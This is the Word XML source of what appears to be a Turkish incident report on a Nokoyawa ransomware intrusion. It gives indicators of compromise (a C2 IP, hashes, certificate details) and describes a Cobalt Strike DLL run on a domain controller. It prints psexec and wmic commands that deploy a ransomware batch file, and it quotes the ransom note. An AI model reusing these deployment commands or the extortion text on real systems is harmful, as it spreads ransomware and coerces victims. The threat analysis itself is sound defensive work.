          <w:tcPr>
            <w:tcW w:w="137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1491F3D" w14:textId="2B9973F2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questdisar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[.]com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="297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538FEE7" w14:textId="67CD4AB7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0e9f5d64349fb13191bc781f81f42e1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3038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3976717" w14:textId="0F81D485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ec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74a5c51106f0419184d0dd08fb05bc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:left w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:bottom w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:right w:val="single" w:color="EBEBEB" w:sz="6"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2521"/>
        <w:gridCol w:w="6494"/>
      </w:tblGrid>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="1E5A5C25">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521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D79D7FB" w14:textId="5E792CE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SSL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Certificate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Details</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649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11DB280C" w14:textId="71C18ED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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="53796D85">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521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84D09D1" w14:textId="1B44ADC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Certificate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Subject</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649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B921F0F" w14:textId="168301E9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O=Internet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Widgits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Pty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Ltd,ST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Some-State,C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AU,CN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localhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="4BA6F40D">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521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10395EC" w14:textId="63ED092B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Certificate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Issuer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649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E5279D3" w14:textId="4445E067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O=Internet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Widgits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Pty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Ltd,ST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Some-State,C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AU,CN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localhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="7C43B8C9">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521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CE5A9CF" w14:textId="1139027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Not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Before</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649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EBC1AB5" w14:textId="5F6BBC5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2022-10-09T09:36:33Z</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="147FE448">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521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5048F85" w14:textId="257850D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Not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After</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649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3C18E3F0" w14:textId="0B3CCE71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2023-10-09T09:36:33Z</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="6B79CF06">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521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3800C547" w14:textId="4C4C9475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Public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Algorithm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649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649B727D" w14:textId="0358C55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rsaEncryption</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="7A18B72A" w14:textId="053307C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12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="5C8F7F1C" w14:textId="5FFB242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</w:pPr>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="2C0C40F5" w14:textId="2C99471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</w:pPr>
    </w:p>
    <w:p w:rsidR="6DD185F5" w:rsidP="12897420" w:rsidRDefault="6DD185F5" w14:paraId="7D6A9819" w14:textId="5CD0DFF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</w:pPr>
      <w:r w:rsidRPr="12897420" w:rsidR="6DD185F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  <w:t>COBALT STRIKE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05E506A6" w:rsidP="12897420" w:rsidRDefault="05E506A6" w14:paraId="0ED1983F" w14:textId="5906CB4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Ana bilgisayarda </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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proofErr w:type="spellStart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exe'ye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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yapılan enjeksiyondan sonra 1.dll (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Cobalt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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Strike DLL) oluşturuldu ve bu daha domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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controller’a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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aktarıldı. Daha sonra 1.dll, rundll32.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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aracılığıyla</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="1E75D7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domain</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="1E75D7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1E75D7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controller’da</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="1E75D74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05E506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çalıştırıldı ve çalıştırıldıktan sonra rundll32.exe, 5.8.18[.]242 komut ve kontrol sunucusuna bağlandı.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:left w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:bottom w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:right w:val="single" w:color="EBEBEB" w:sz="6"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1244"/>
        <w:gridCol w:w="577"/>
        <w:gridCol w:w="3602"/>
        <w:gridCol w:w="3592"/>
      </w:tblGrid>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="2896730A">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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5C69157" w14:textId="6D8E439B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IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="577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8A58319" w14:textId="6E7DED97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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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759502C" w14:textId="2E2021E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Ja3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="359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FD3E5AF" w14:textId="0046AD8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Ja3s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="38BCD478">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1244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9DDD799" w14:textId="1F50B18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5.8.18[.]242</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="577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40BF34C1" w14:textId="1766C339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443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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66CAA6C6" w14:textId="717CC2F2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72a589da586844d7f0818ce684948eea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3592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8008493" w14:textId="7448414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f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176ba63b4d68e576b5ba345bec2c7b7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:left w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:bottom w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:right w:val="single" w:color="EBEBEB" w:sz="6"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4300"/>
        <w:gridCol w:w="4715"/>
      </w:tblGrid>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="6F084781">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4300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76FFB2E" w14:textId="6AD4353A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SSL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Certificate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Details</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4715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1EB43B4" w14:textId="76AF6D9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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="4524F7BD">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4300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3A0A18A3" w14:textId="64011AF8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Certificate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Subject</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4715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B99CD7E" w14:textId="2866A381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CN</w:t>
            </w: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=,OU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=,O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=,L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=,ST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=,C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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="243D491C">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4300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592D742" w14:textId="06E6ACE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Certificate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Issuer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4715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C468143" w14:textId="4985085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CN</w:t>
            </w:r>
            <w:proofErr w:type="gram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=,OU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=,O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=,L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=,ST</w:t>
            </w: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=,C</w:t>
            </w:r>
            <w:proofErr w:type="gram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=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="37B73EAD">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4300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2EDCCE19" w14:textId="3ECBF959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Not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Before</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4715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5BA61097" w14:textId="713056D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2015-05-20T18:26:24Z</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="3CE3B2F2">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4300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67CA2D1" w14:textId="00640319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Not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After</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4715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64AD853" w14:textId="170B4EA9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2025-05-17T18:26:24Z</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="1E5F0879">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4300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08D7F8BB" w14:textId="0101D12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Public</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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Algorithm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4715" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"/>
              <w:left w:val="single" w:sz="6"/>
              <w:bottom w:val="single" w:sz="6"/>
              <w:right w:val="single" w:color="EBEBEB" w:sz="6"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="7949405D" w14:textId="3B04897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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="12897420" w:rsidR="12897420">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
              </w:rPr>
              <w:t>rsaEncryption</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="60344E5F" w14:textId="26C5101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703D715C" w:rsidP="12897420" w:rsidRDefault="703D715C" w14:paraId="3144B630" w14:textId="530BEF7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</w:pPr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32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>IMPACT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="703D715C" w:rsidP="12897420" w:rsidRDefault="703D715C" w14:paraId="685FB227" w14:textId="463C09D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PsExec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ve WMIC kullanarak fidye yazılım bilgisayarlara dağıtıldı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="703D715C" w:rsidP="12897420" w:rsidRDefault="703D715C" w14:paraId="63AC7010" w14:textId="619DE9C9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psexec.exe \\[TARGET IP] -u [DOMAIN]\[USER] -p "[PASSWORD]" -s -d -h -r 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mstdc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-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accepteula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-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nobanner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c:\windows\temp\p.bat</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="703D715C" w:rsidP="12897420" w:rsidRDefault="703D715C" w14:paraId="07DC7BC0" w14:textId="04AA7FFA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703D715C">
        <w:drawing>
          <wp:inline wp14:editId="43D7DA47" wp14:anchorId="2EEC83A8">
            <wp:extent cx="5724524" cy="1400175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="283601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338e8fdd6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wmic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/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node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:"[TARGET IP]" /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user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:"[DOMAIN]\[USER]" /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password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:"[PASSWORD]" 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process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call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create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="703D715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"cmd.exe /c c:\windows\temp\p.bat"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="703D715C">
        <w:drawing>
          <wp:inline wp14:editId="12F921D3" wp14:anchorId="541432E2">
            <wp:extent cx="5724524" cy="1323975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="133153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b423eea23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0CBA243D" w14:textId="6BF9EC43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897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="3DEBA3F3" w14:textId="380C6D47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</w:p>
    <w:p w:rsidR="12E49DDF" w:rsidP="12897420" w:rsidRDefault="12E49DDF" w14:paraId="470C347C" w14:textId="70B70A1C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12E49DDF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>p.bat, k.exe (fidye virüsünü) çalıştırmak için görevlendirilmiştir. Aşağıdaki komutla bunu anlayabiliriz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12E49DDF" w:rsidP="12897420" w:rsidRDefault="12E49DDF" w14:paraId="75893139" w14:textId="60C82C6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2E49DD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c:\windows\temp\k.exe --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="12E49DD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config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="12E49DD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REDACTED</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12E49DDF" w:rsidP="12897420" w:rsidRDefault="12E49DDF" w14:paraId="058CCED6" w14:textId="2EF645E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2E49DD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Komut parametrelerinde sağlanan yapılandırmayı inceledikten sonra, bu özel fidye yazılımı ağı şifrelemek, gizli sürücüleri ve kopyaları yüklemek için yapılandırılmıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="615CE0C5" w:rsidP="12897420" w:rsidRDefault="615CE0C5" w14:paraId="7D3D6B9B" w14:textId="5D268211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="615CE0C5">
        <w:drawing>
          <wp:inline wp14:editId="722D2E9E" wp14:anchorId="2A894781">
            <wp:extent cx="5295058" cy="3629891"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="163188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4dcaf72ba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058" cy="36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CE0C5" w:rsidP="12897420" w:rsidRDefault="615CE0C5" w14:paraId="5A366806" w14:textId="7D4A7875">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="12897420" w:rsidR="615CE0C5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>Fidye yazılımı bazı dosya yollarını ve uzantıların şifrelenmesini atlamasını istemiştir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="615CE0C5" w:rsidP="12897420" w:rsidRDefault="615CE0C5" w14:paraId="6D2B3982" w14:textId="75F0421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Excluded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Directories</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Windows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Program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Files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Program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Files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(x86)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AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ProgramData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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System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Volum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Information</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/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Excluded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File Extensions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.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exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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.dll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.ini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.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lnk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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.url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- ""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="362DD8D1" w14:textId="638F654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12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="3708B8E0" w14:textId="60B5DF9A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12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="068854D4" w14:textId="70D4D9C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615CE0C5" w:rsidP="12897420" w:rsidRDefault="615CE0C5" w14:paraId="53BF683A" w14:textId="6628BEB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Son olarak fidye virüsü bir not </w:t>
      </w:r>
      <w:proofErr w:type="gram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bırakır..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="615CE0C5" w:rsidP="12897420" w:rsidRDefault="615CE0C5" w14:paraId="24C72FE3" w14:textId="1EDE181E">
      <w:pPr>
        <w:pStyle w:val="Normal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tr-TR"/>
        </w:rPr>
      </w:pP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Nokoyawa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br/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If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this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,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files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were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successfully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encrypted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advice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not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to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search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free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decryption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method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It's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impossible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.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are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using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symmetrical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and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asymmetric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encryption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ATTENTION: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Don't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rename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encrypted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files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Don't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change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encrypted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files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Don't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use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third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party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software.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:br/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To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reach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an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agreement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offer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to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visit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our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Onion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Website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How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to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open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Onion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links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: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Download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TOR Browser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from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official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website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Open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and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enter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this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link:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab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http://[REDACTED]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On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page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will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chat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with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Support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tab/>
      </w:r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Send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first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message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  <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:br/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faster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contact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with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us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the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faster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you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will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get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a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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solution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="615CE0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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="13645323" w14:textId="1780267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p w:rsidR="3BDB10DD" w:rsidP="12897420" w:rsidRDefault="3BDB10DD" w14:paraId="24D0709D" w14:textId="1C72BD7D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Eğer bunu görüyorsanız dosyalarınızı başarılı bir şekilde şifreledik. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3BDB10DD" w:rsidP="12897420" w:rsidRDefault="3BDB10DD" w14:paraId="38E909B3" w14:textId="56D2232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Bedava şifre çözme </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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metodlarını</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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denemeyiniz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3BDB10DD" w:rsidP="12897420" w:rsidRDefault="3BDB10DD" w14:paraId="0B482535" w14:textId="1541B0F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Bu imkans</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="58B53A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ı</w:t>
      </w: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z. Asimetrik ve simetrik dosya şifreleme yöntemi kullanıyoruz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3BDB10DD" w:rsidP="12897420" w:rsidRDefault="3BDB10DD" w14:paraId="6FE58E0F" w14:textId="7A00A59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UYARI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3BDB10DD" w:rsidP="12897420" w:rsidRDefault="3BDB10DD" w14:paraId="1CBC2B1E" w14:textId="2C356E7A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Şifrelenmiş dosyaları yeniden isimlendirmeye çalışmayın</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3BDB10DD" w:rsidP="12897420" w:rsidRDefault="3BDB10DD" w14:paraId="3F63A7DC" w14:textId="39705856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Şifrelenmiş dosyaları değişt</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="7B1C21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i</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="3BDB10D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rmeye çalıştırm</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="6E7A19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ayın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="111E76FC" w:rsidP="12897420" w:rsidRDefault="111E76FC" w14:paraId="76D5CC30" w14:textId="48320016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11E76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Üçüncü parti uygulamaları kullanmayın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="111E76FC" w:rsidP="12897420" w:rsidRDefault="111E76FC" w14:paraId="45A00589" w14:textId="2716C27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111E76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Anlaşmaya varmak için </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="111E76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Onion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="111E76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5A6A5D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sitemi</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="2D34EF5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zi ziyaret ediniz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="545C6B9E" w:rsidP="12897420" w:rsidRDefault="545C6B9E" w14:paraId="7D113836" w14:textId="56D12DE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Onion bağlantıları nasıl açılır: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="545C6B9E" w:rsidP="12897420" w:rsidRDefault="545C6B9E" w14:paraId="2912CA45" w14:textId="194835BE">
      <w:pPr>
        <w:pStyle w:val="Normal"/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TOR Browser'ı resmi web sitesinden indirin. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="545C6B9E" w:rsidP="12897420" w:rsidRDefault="545C6B9E" w14:paraId="61A63DBF" w14:textId="79E116BA">
      <w:pPr>
        <w:pStyle w:val="Normal"/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Bu bağlantıyı açın ve girin: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="545C6B9E" w:rsidP="12897420" w:rsidRDefault="545C6B9E" w14:paraId="236B12E3" w14:textId="346CFE81">
      <w:pPr>
        <w:pStyle w:val="Normal"/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http://[REDACTED</w:t>
      </w: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] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="545C6B9E" w:rsidP="12897420" w:rsidRDefault="545C6B9E" w14:paraId="1BD97C07" w14:textId="31F8E0D7">
      <w:pPr>
        <w:pStyle w:val="Normal"/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Sayfada Destek ile bir sohbet göreceksiniz. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="545C6B9E" w:rsidP="12897420" w:rsidRDefault="545C6B9E" w14:paraId="2322ACF8" w14:textId="50457918">
      <w:pPr>
        <w:pStyle w:val="Normal"/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- İlk mesajınızı gönderin. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="545C6B9E" w:rsidP="12897420" w:rsidRDefault="545C6B9E" w14:paraId="5B31D8B8" w14:textId="602EC491">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pP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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="545C6B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  <w:t>Bizimle ne kadar hızlı iletişime geçerseniz o kadar hızlı çözüm alırsınız.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2926081A" w:rsidP="12897420" w:rsidRDefault="2926081A" w14:paraId="4EB02C26" w14:textId="5321A9A1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2926081A">
        <w:drawing>
          <wp:inline wp14:editId="7767BC1A" wp14:anchorId="5500CA73">
            <wp:extent cx="4791076" cy="5724524"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="48686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943b71f03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97420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="24067235" w14:textId="613E092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24242"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="tr-TR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508a5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e2fac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78598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aaf7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99C2B6"/>
    <w:rsid w:val="00CFC1F8"/>
    <w:rsid w:val="00E1B394"/>
    <w:rsid w:val="01A735CE"/>
    <w:rsid w:val="027132D9"/>
    <w:rsid w:val="02B9D766"/>
    <w:rsid w:val="0458C919"/>
    <w:rsid w:val="04D4DEAB"/>
    <w:rsid w:val="050B9F26"/>
    <w:rsid w:val="051BF8DC"/>
    <w:rsid w:val="0536F33F"/>
    <w:rsid w:val="05719D08"/>
    <w:rsid w:val="05C7034C"/>
    <w:rsid w:val="05E506A6"/>
    <w:rsid w:val="062D0B51"/>
    <w:rsid w:val="0639EB4B"/>
    <w:rsid w:val="06581730"/>
    <w:rsid w:val="068D6656"/>
    <w:rsid w:val="06E6919A"/>
    <w:rsid w:val="073EAE91"/>
    <w:rsid w:val="0805C389"/>
    <w:rsid w:val="08947EE3"/>
    <w:rsid w:val="0B341F87"/>
    <w:rsid w:val="0BE9B844"/>
    <w:rsid w:val="0C4BA3DB"/>
    <w:rsid w:val="0C620D16"/>
    <w:rsid w:val="0CA27D72"/>
    <w:rsid w:val="0CE1608F"/>
    <w:rsid w:val="0DDAAC42"/>
    <w:rsid w:val="0DF7501D"/>
    <w:rsid w:val="0E7003FA"/>
    <w:rsid w:val="0EF0BE6D"/>
    <w:rsid w:val="0F0E6467"/>
    <w:rsid w:val="0F750361"/>
    <w:rsid w:val="0FCBCA57"/>
    <w:rsid w:val="0FE5398C"/>
